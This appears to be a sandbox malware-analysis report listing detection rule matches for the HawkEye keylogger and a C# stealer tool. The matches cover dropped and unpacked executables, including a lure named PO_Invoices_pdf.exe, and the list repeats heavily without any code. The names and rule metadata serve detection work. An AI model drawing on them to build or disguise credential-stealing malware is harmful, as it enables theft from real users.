Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: dropped/hawkgoods.exe, type: DROPPED | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: dropped/hawkgoods.exe, type: DROPPED | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: dropped/hawkgoods.exe, type: DROPPED | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hawkgoods.exe.73f0000.10.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hawkgoods.exe.7540000.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.7c90000.10.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.7f40000.11.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.hawkgoods.exe.31f8c9c.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.2a689b0.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
